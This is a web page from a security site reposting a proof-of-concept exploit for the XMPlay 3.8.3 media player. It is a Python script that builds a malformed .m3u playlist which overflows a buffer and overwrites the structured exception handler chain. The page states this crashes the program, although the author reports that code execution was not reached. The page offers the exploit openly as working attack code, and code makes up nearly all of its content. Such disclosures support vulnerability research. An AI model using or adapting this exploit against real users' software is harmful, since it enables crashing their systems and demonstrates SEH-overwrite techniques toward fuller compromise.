首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
XMPlay 3.8.3 Denial Of Service
来源:vfocus.net 作者:s7acktrac3 发布时间:2018-11-20  
# Exploit Title: XMPlay 3.8.3 - '.m3u' Denial of Service (PoC)
# Date: 2018-11-18
# Exploit Author: s7acktrac3
# Vendor Homepage: https://www.xmplay.com/
# Software Link: https://support.xmplay.com/files_view.php?file_id=676
# Version: 3.8.3 (latest)
# Tested on: Windows XP/7/8
# CVE : N/A
#
# Lauch XMPlay and either drag xmplay.m3u into the XMPlay window or
# File Menu-> select winamp.m3u and Crash!
# -*- coding: utf-8 -*-
#
# Note: Successfully can overwrite the SEH chain & control the handler and nSEH
# but the address get mangled & unreconizable, for this reason could not turn into
# code execution.
 
import struct
from struct import pack
 
file_data = "#EXTM3U\n\r"
file_data += "#EXTINF:200,Sleep Away\n\r"
file_data += "http://test."
 
max_size = 3000 - 1
nseh_offset = 656
 
seh_overwrite = pack("<L", 0x00402450)
 
payload = "A" * nseh_offset # padding for nseh
payload += "BBBB"               # nseh
payload += seh_overwrite        # seh
 
#padding for rest of payload - pipe "|" is needed somehow to force crash 
payload += "D" *(max_size - len(payload)) + "|"
print "[+] Creating .m3u file with payload size: "+ str(len(payload))
 
exploit = file_data + payload
 
file = open('xmplay.m3u','w');
file.write(exploit);
file.close();
  
print "[+] Done creating the file"


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·HTML Video Player 1.2.5 Buffer
·Microsoft Edge Chakra OP_Memse
·Linux - Broken uid/gid Mapping
·ImageMagick - Memory Leak
·Easy Outlook Express Recovery
·macOS 10.13 - 'workq_kernretur
·Mumsoft Easy Software 2.0 - De
·Xorg X11 Server SUID Privilege
·Malicious Git HTTP Server
·MariaDB Client 10.1.26 - Denia
·Notepad3 1.0.2.350 - Denial of
·ELBA5 5.8.0 - Remote Code Exec
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved